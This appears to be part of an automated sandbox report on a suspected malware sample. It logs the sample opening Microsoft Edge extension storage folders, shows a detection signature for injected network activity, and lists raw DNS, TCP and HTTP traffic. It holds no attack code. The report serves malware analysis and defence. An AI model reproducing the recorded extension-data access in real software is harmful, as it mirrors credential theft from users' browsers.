Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	83_2_00007FF6D7EEE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F388E0 FindFirstFileExA,	83_2_00007FF6D7F388E0

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\svchost.exe

Domain query: code.jquery.com

Source: unknown

Network traffic detected: DNS query count 39

Source: global traffic

TCP traffic: 192.168.2.4:51189 -> 1.1.1.1:53

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 152.199.19.74
Source: unknown	TCP traffic detected without corresponding DNS query: 152.199.19.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 104.18.38.233
Source: unknown	TCP traffic detected without corresponding DNS query: 152.199.19.74
Source: unknown	TCP traffic detected without corresponding DNS query: 152.199.19.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: global traffic	HTTP traffic detected: GET /tgmacro/download HTTP/1.1Host: trksyln.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /Error HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://trksyln.net/tgmacro/downloadAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/tgmacro/downloadAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://trksyln.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://trksyln.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /resources/css/site.css HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /resources/css/navbar.css HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /resources/js/navbar.js HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /td/ga/rul?tid=G-JH2MNQ1WXY&gacid=1627253267.1730398763&gtm=45je4au0v9106823843za200&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533422~101823848~101878899~101878944~101925629&z=1195082281 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /resources/css/projectCard.css HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
Source: global traffic	HTTP traffic detected: GET /resources/img/logo.png HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
Source: global traffic	HTTP traffic detected: GET /resources/img/error.png HTTP/1.1Host: trksyln.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/ErrorAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://trksyln.netsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /i/pub-9495854422341365?ers=1 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxV0ZPylImy9Jv559Xp-MfnxImaXclZ9OIKioUncC-GjReRDOsqaZURJYln7HbKIHyw60n2CPZC7wftExCVvpG55gIUpCQASPLV6D5xkeZKDyuznFxUsEyU7ddDqW8yK_JFWTVcJHA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzY3LDE4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /resources/img/logo.png HTTP/1.1Host: trksyln.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
Source: global traffic	HTTP traffic detected: GET /resources/img/error.png HTTP/1.1Host: trksyln.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0
Source: global traffic	HTTP traffic detected: GET /i/pub-9495854422341365?ers=1 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wikipedia/commons/thumb/7/7d/Microsoft_.NET_logo.svg/1200px-Microsoft_.NET_logo.svg.png HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /f/AGSKWxV0ZPylImy9Jv559Xp-MfnxImaXclZ9OIKioUncC-GjReRDOsqaZURJYln7HbKIHyw60n2CPZC7wftExCVvpG55gIUpCQASPLV6D5xkeZKDyuznFxUsEyU7ddDqW8yK_JFWTVcJHA==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzY3LDE4MTAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzddXSwiaHR0cHM6Ly90cmtzeWxuLm5ldC9FcnJvciIsbnVsbCxbWzgsIllzZ09PY3R1a3JJIl0sWzksImVuLVVTIl0sWzE5LCIyIl0sWzE3LCJbMF0iXV1d HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaSlXYrtDuu4pAJLur9Ub7fKrWLtJq0XiZy1q4NDaN8Rfcv23oFmtaozMUOehwQh26-ih-zXtEMC6NlEgBM1zyLKhoFM_w HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaQdsNBo9WRTFG5NvmpTSV1NED_cHunzkusyqhhJ8wsHTvFR9ycGSGsL-T38B7ZwdJYBS7dgA391Exs0qr0ZBQUJ4_OAxg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1 HTTP/1.1Host: odr.mookie1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pagead/drt/ui HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
